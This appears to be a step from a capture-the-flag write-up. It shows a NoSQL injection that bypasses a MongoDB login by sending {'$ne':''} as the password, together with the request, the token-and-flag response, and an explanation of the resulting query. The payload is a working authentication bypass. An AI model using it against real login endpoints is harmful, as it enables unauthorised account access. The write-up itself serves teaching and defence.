MongoDB queries can accept operator objects. Replace the password value with {"$ne": ""} — "password is not equal to empty string" — which is always true for any existing password.
Command / Input
POST /api/login
{"username":"admin","password":{"$ne":""}}
Output
{"token":"...","flag":"HackrGG{n0sql_1nj3ct10n_byp4ss3d}"}
⚑ The query becomes: db.users.findOne({username:"admin", password:{$ne:""}}) — matches any document with a non-empty password.